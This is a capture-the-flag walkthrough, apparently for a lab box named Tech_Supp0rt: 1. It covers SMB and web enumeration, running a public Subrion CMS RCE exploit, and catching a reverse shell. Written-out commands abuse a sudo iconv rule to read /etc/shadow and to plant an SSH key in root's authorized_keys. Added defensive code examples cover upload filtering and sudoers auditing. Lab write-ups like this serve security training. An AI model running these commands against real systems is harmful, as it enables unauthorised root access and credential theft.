# Tech\_Supp0rt: 1

## Nmap

```
nmap 10.10.195.72 -p- -sS -sV

PORT    STATE    SERVICE     VERSION
22/tcp  open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
53/tcp  filtered domain
80/tcp  open     http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

First, we check `SMB` for null-session access and find the share *websrv*, which is readable by anyone.

```
smbmap -H '10.10.195.72' -u '' -p '' -R
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FvvaTsTwYfFOC1COtvEdD%2Fimage.png?alt=media\&token=8af86fc0-edec-4043-ae18-10c0e50da8af)

The file `enter.txt` is of interest, so we download it using `smbmap`.

```
smbmap -H '10.10.195.72' -u '' -p '' -R -A 'enter.txt'
```

Reading the contents of `enter.txt`, we find it is a to-do list. We make a note of the information, as it is referred to again later.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FxIrprrcIHDnYTtRshaZZ%2Fimage.png?alt=media\&token=68da6c04-f7c8-4a29-b1ff-15edf4f6d8e7)

Port 80 serves the default `Apache 2` landing page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FTmppoY6y6B93Gr8vSCPO%2Fimage.png?alt=media\&token=c89556a2-cdea-4d09-abad-ad3f6ad6fa57)

Running `feroxbuster` against the target system we discover a few interesting results.

```
feroxbuster -u http://<IP> -w /usr/share/seclists/Discovery/Web-Content/common.txt -s 200 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FittYTlbEvttQf39J7rzW%2Fimage.png?alt=media\&token=e96f3669-939e-44b2-b70c-73de79b60e95)

Under `/test/index.html` we find a fake scam web page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDFaoIpXPskajEYrQTkbC%2Fimage.png?alt=media\&token=1322a38c-d010-4e85-aa3e-fb747ab148e8)

We also find WordPress is installed under `/wordpress/`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2AT2Potj3j8vrlHhYurA%2Fimage.png?alt=media\&token=f0ddad15-dc52-4571-b056-44844ecbdfef)

I enumerated the `WordPress` site and tried to identify vulnerable plugins with `WPScan`, but was unable to find any vulnerabilities.

Looking back at the information in the `enter.txt` file, we are reminded of the presence of `Subrion`, which is a CMS.

Browsing to `/subrion` results in a broken redirect. The `enter.txt` file mentions fixing the issue by using the "panel"; a quick Google search shows this normally lives under the directory `/panel`.

Browsing to `http://<IP>/subrion/panel/` proves successful.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FzgCFlLuChLxEnMOb9xPe%2Fimage.png?alt=media\&token=e16c4563-056e-4a8c-b160-64dc080f1bb1)

However, we are unable to log in to the system. Looking at the admin credentials noted earlier from `enter.txt`, we see the remark "Cooked with magic formula".

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9tGzUuRXqQ7esvz8neX9%2Fimage.png?alt=media\&token=68a4277a-0c68-4e7a-9be2-dbcd8cc36211)

Taking the "hash" value and running it through CyberChef's "Magic" operation reveals the plaintext password. Magic detects and unwinds layered encodings rather than cracking hashes, so the stored value was a reversible encoding of the password, not a true hash.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FkCBYNer3BUvQkNzWL4oF%2Fimage.png?alt=media\&token=26f86d13-da1d-48fd-b1ec-0aacc35efada)

We are then able to log in successfully to the Subrion panel.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FCoDKIQnCUmeeOoxdx6kH%2Fimage.png?alt=media\&token=94f25681-062c-427b-a34d-0655febe584f)

Researching vulnerabilities for Subrion 4.2.1 on Google, we find the following CVE and an exploit on GitHub.

**CVE:** <https://nvd.nist.gov/vuln/detail/CVE-2018-19422>

**Description**

/panel/uploads in Subrion CMS 4.2.1 allows remote attackers to execute arbitrary PHP code via a .pht or .phar file, because the .htaccess file omits these.

**GitHub:** <https://github.com/h3v0x/CVE-2018-19422-SubrionCMS-RCE>
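The CVE description above comes down to an upload filter that denies a fixed list of extensions and so misses `.pht` and `.phar`. The following is an added illustration, not code from the write-up or from Subrion, contrasting that deny-list check with an allow-list check; the extension lists and sample file names are constructed for the example.

```python
# Added example: contrasts the deny-list upload check behind CVE-2018-19422
# with an allow-list check. Not Subrion's code; the lists below are constructed.
import posixpath

# Constructed deny-list of "PHP-like" extensions. Like the .htaccess in the
# CVE description, it omits .pht and .phar, so those still reach the server
# as executable PHP.
DENY_LIST = {"php", "php3", "php4", "php5", "phtml"}

# Constructed allow-list: only the types the upload feature actually needs.
ALLOW_LIST = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}


def extension_chain(filename):
    """All extensions of a name, lowercased: 'shell.php.jpg' -> ['php', 'jpg']."""
    parts = posixpath.basename(filename).lower().split(".")
    return [p for p in parts[1:] if p]


def denylist_allows(filename):
    """Weak check: reject only when the final extension is on the deny-list.
    Misses anything the list forgot (.pht, .phar) and double extensions."""
    chain = extension_chain(filename)
    return not chain or chain[-1] not in DENY_LIST


def allowlist_allows(filename):
    """Hardened check: every extension in the chain must be on the allow-list,
    so 'shell.pht', 'shell.phar' and 'shell.php.jpg' are all rejected.
    (Pair this with server-generated file names and no script execution
    in the upload directory; the name check alone is not the whole fix.)"""
    chain = extension_chain(filename)
    return bool(chain) and all(ext in ALLOW_LIST for ext in chain)


# Constructed sample names, including the two extensions from the CVE text.
SAMPLES = ["report.pdf", "shell.php", "shell.pht", "shell.phar",
           "shell.php.jpg", "logo.PNG"]


def compare(names=SAMPLES):
    """Map each name to (deny-list verdict, allow-list verdict)."""
    return {n: (denylist_allows(n), allowlist_allows(n)) for n in names}


if __name__ == "__main__":
    for name, (deny, allow) in compare().items():
        print(f"{name:15} deny-list allows={deny!s:5} allow-list allows={allow}")
```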

As per the GitHub repository, we run the exploit with the following syntax:

```bash
python3 exploit.py -u 'http://10.10.26.125/subrion/panel/' -l 'admin'  -p <Password>
```

We receive a shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDNU977ZiIleOWrsXHZjK%2Fimage.png?alt=media\&token=ccf6bb0b-3ba2-4c35-bb5b-b9bc1f0d3082)

Unfortunately, this shell is not ideal for what we need, so I uploaded a PHP reverse shell and set up a `netcat` listener on my attacking system.

I was then able to catch a more reliable shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdUrIkAsINPgrcYjF3zSG%2Fimage.png?alt=media\&token=0f448b7a-b51e-4e3b-96e9-225e7c0a8616)

Next, upgrade to a TTY shell.

{% content-ref url="../../../everything/everything-linux/shell-upgrades" %}
[shell-upgrades](https://viperone.gitbook.io/pentest-everything/everything/everything-linux/shell-upgrades)
{% endcontent-ref %}

Enumerating the WordPress install we find some credentials in `wp-config.php`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F3eZfyDFIcnCcKXRK0nQQ%2Fimage.png?alt=media\&token=be272476-6d22-4016-97de-a4bcb06d7f38)

Looking at `/etc/passwd` we see the user *scamsite* exists on the system. We are then able to switch over to the user with the found credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F5l5HnvHkVJt4sucqLKIj%2Fimage.png?alt=media\&token=effb9704-0d16-43f3-ac1c-470f6edae468)

Checking the **sudo** permissions for *scamsite* we see the user is able to run `/usr/bin/iconv` as root without specifying a password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FoBOU6xaJYUbAF7tFEBhR%2Fimage.png?alt=media\&token=8173dba4-c239-4e7e-ace1-ee1454176fb9)

Viewing GTFOBins, we see this binary can be used to perform privileged reads and writes on the system.

**GTFOBins:** <https://gtfobins.github.io/gtfobins/iconv/>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FwhPjjFT5qLRAdmOCk2Hm%2Fimage.png?alt=media\&token=1042c8fa-6d6a-418d-8518-1356f5cb38c6)

We can go for an easy flag grab:

```bash
sudo /usr/bin/iconv -f 8859_1 -t 8859_1 /etc/shadow
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FF8K2rT0rRiWoU4poRTNz%2Fimage.png?alt=media\&token=0ebd58df-50a5-4f94-897c-a6cfbf390d3c)
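The sudo rule above is the kind of thing a periodic sudoers audit should catch. Below is an added example, not from the write-up or GTFOBins, that parses a constructed sudoers fragment and flags NOPASSWD rules whose binary is on a small, hand-picked set of GTFOBins file read/write primitives; it handles only the common `user host=(runas) [NOPASSWD:] command` rule form.

```python
# Added example, not from the write-up or GTFOBins: audit sudoers-style rules
# for NOPASSWD entries that hand out file read/write primitives like iconv.
import re

# Constructed, hand-picked subset of binaries GTFOBins documents with
# "file read" / "file write" functions.
FILE_RW_BINARIES = {"iconv", "cp", "tee", "dd", "sed", "vim", "less"}

# Constructed sudoers fragment mirroring the misconfiguration on the box.
SUDOERS = """\
Defaults        env_reset
root     ALL=(ALL:ALL) ALL
scamsite ALL=(ALL) NOPASSWD: /usr/bin/iconv
webadmin ALL=(ALL) /usr/bin/systemctl restart apache2
backup   ALL=(root) NOPASSWD: /bin/tar -czf /backup/www.tgz /var/www
"""

# Handles the common "user host=(runas) [TAG:] cmd[, cmd]" form only.
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
                     r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def parse_rules(text):
    """Parse user-specification lines into dicts; skip Defaults and comments."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({"user": m.group("user"), "runas": m.group("runas"),
                          "nopasswd": "NOPASSWD:" in m.group("tags"),
                          "cmds": [c.strip() for c in m.group("cmds").split(",")]})
    return rules


def find_risky(text):
    """(user, command) pairs that run password-less and whose binary can read or
    write arbitrary files. Matches on the binary name only, so a rule with
    tightly pinned arguments is still reported for a human to review."""
    findings = []
    for rule in parse_rules(text):
        for cmd in rule["cmds"]:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if rule["nopasswd"] and (cmd == "ALL" or binary in FILE_RW_BINARIES):
                findings.append((rule["user"], cmd))
    return findings
```

Running `find_risky(SUDOERS)` reports the `scamsite` / `/usr/bin/iconv` rule and nothing else from the fragment.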

Alternatively we can grab a root `SSH` shell.

```
# Generate SSH key files on the attacking system
ssh-keygen
# Keep hitting enter to generate a new ~/.ssh/id_rsa.pub
```

On the target system, paste the contents of the attacking machine's `~/.ssh/id_rsa.pub` into the command below to create the `authorized_keys` file in the `/root/.ssh/` directory.

```
echo 'ssh-rsa <PUBLIC_KEY> kali@kali' | sudo /usr/bin/iconv -f 8859_1 -t 8859_1 -o /root/.ssh/authorized_keys
```

Then log in to the target system as root without needing to specify a password.

```bash
ssh root@<IP>
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fj8MPKJJ7JC3DsvckuFEV%2Fimage.png?alt=media\&token=97273079-3a07-4151-a2fe-418478fe58c4)
